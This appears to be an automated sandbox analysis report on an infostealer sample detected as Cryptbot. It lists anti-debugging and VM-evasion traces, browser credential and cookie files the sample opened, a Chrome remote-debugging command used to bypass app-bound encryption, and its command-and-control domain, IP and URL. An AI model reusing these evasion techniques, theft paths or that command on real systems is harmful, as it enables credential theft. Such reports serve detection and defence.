Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0071 second address: 71D0080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0080 second address: 71D0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0092 second address: 71D00C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3313C0921h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC3313C0926h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D00C6 second address: 71D00CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D00CC second address: 71D00F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dl, byte ptr [ebp+14h] 0x0000000e jmp 00007FC3313C091Eh 0x00000013 mov eax, dword ptr [ebp+10h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D00F8 second address: 71D0108 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and dl, 00000007h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0108 second address: 71D0122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0926h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0122 second address: 71D0191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007FC330B7B106h 0x00000010 je 00007FC3A08A119Fh 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FC330B7B0FEh 0x0000001d and cx, 44E8h 0x00000022 jmp 00007FC330B7B0FBh 0x00000027 popfd 0x00000028 mov ah, 44h 0x0000002a popad 0x0000002b mov ecx, 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FC330B7B107h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71D0191 second address: 71D01A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C0924h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0A05 second address: 71B0A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC330B7B100h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0A29 second address: 71B0A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0A2F second address: 71B0A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0A35 second address: 71B0A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0928h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3313C0927h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0A6E second address: 71B0AAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC330B7B0FEh 0x0000000f push eax 0x00000010 jmp 00007FC330B7B0FBh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0AAD second address: 71B0AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0AB1 second address: 71B0ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0ACC second address: 71B0B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jmp 00007FC3313C091Ch 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC3313C091Ch 0x00000018 and al, 00000028h 0x0000001b jmp 00007FC3313C091Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0B09 second address: 71B0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0B0D second address: 71B0B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0927h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0B28 second address: 71B0B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC330B7B104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0B40 second address: 71B0B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 pushfd 0x00000012 jmp 00007FC3313C0920h 0x00000017 or cl, 00000048h 0x0000001a jmp 00007FC3313C091Bh 0x0000001f popfd 0x00000020 popad 0x00000021 sub ecx, ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC3313C0922h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0B8E second address: 71B0B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0B94 second address: 71B0BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 mov bx, si 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0BB2 second address: 71B0BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0BB8 second address: 71B0BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0BBC second address: 71B0BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0BC0 second address: 71B0BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3313C0925h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B0BE0 second address: 71B0C41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC330B7B0FCh 0x00000011 sub ecx, 3FD4A3C8h 0x00000017 jmp 00007FC330B7B0FBh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FC330B7B106h 0x00000025 sbb esi, 310DA628h 0x0000002b jmp 00007FC330B7B0FBh 0x00000030 popfd 0x00000031 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B54B71 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B54A2D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D0DF91 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D845D9 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 828 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 609 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1608 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 825 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1418 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 998 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 2702 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 7295 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 3.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7336 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7308 Thread sleep count: 828 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7308 Thread sleep time: -1656828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7416 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7312 Thread sleep count: 609 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7312 Thread sleep time: -1218609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7332 Thread sleep count: 1608 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7332 Thread sleep time: -3217608s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 825 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep time: -1650825s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7328 Thread sleep count: 1418 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7328 Thread sleep time: -2837418s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7332 Thread sleep count: 998 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7332 Thread sleep time: -1996998s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6536 Thread sleep count: 2702 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6536 Thread sleep time: -270200s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6536 Thread sleep count: 7295 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6536 Thread sleep time: -729500s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2022466838.000000000167E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134891477.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135125187.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2180400026.0000021FD8128000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_01008230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_01008230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_0100116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_0100116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_01001160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_01001160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_010011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_010011A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_010013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_010013C9
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 8.2.service123.exe.6c0c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 6520, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2135004931.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2135101933.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101399519.0000000001704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101362640.0000000001704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101270214.0000000001704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2134969691.0000000001723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2134858064.0000000001719000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2201084663.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101270214.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2200918174.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2201246515.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7292, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2135004931.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2135101933.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101399519.0000000001704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101362640.0000000001704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101270214.0000000001704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2134969691.0000000001723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2134858064.0000000001719000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2201084663.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2101270214.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2200918174.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2201246515.0000000001738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7292, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1558889 Sample: file.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 8 other signatures 2->55 7 file.exe 5 2 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        16 service123.exe 2->16         started        process3 dnsIp4 41 home.fvtekk5pn.top 7->41 43 fvtekk5pn.top 34.116.198.130, 49730, 49738, 49739 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->43 45 127.0.0.1 unknown unknown 7->45 35 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 7->35 dropped 37 C:\Users\user\AppData\...\service123.exe, PE32 7->37 dropped 57 Attempt to bypass Chrome Application-Bound Encryption 7->57 59 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->59 61 Uses schtasks.exe or at.exe to add and modify task schedules 7->61 63 7 other signatures 7->63 18 WerFault.exe 21 16 7->18         started        21 chrome.exe 7->21         started        24 schtasks.exe 1 7->24         started        26 service123.exe 7->26         started        file5 signatures6 process7 dnsIp8 33 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->33 dropped 39 239.255.255.250 unknown Reserved 21->39 28 chrome.exe 21->28         started        31 conhost.exe 24->31         started        file9 process10 dnsIp11 47 www.google.com 142.250.185.196, 443, 49746 GOOGLEUS United States 28->47
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.185.196
 www.google.com United States
15169 GOOGLEUS false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 142.250.185.196 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 true
  • Avira URL Cloud: safe
 unknown
